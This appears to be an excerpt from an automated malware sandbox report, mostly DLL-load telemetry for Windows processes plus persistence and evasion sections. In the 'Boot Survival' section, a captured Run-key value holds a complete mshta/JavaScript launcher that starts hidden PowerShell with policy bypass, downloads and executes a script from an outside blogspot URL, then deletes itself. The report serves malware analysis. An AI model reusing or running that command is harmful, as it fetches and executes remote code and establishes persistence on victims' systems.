            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: profapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: devobj.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: drprov.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: winsta.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: ntlanman.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: davclnt.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: davhlpr.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sxs.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dpapi.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

            Boot Survival

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run zevUsecure104
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run zevUsecure104 mshta "javascript:var mww = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://mrachnew12.blogspot.com/lilw.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], rfc = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], rjz = new ActiveXObject(mww[0]); rjz[mww[1]](mww[2], mww[3], mww[4], mww[5], mww[6]);close(); new ActiveXObject(rfc[0])[rfc[1]](WScript[rfc[2]]);"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakezevo125
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run zevUsecure104
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run zevUsecure104
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run zevUsecure104
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakezevo125
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakezevo125

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
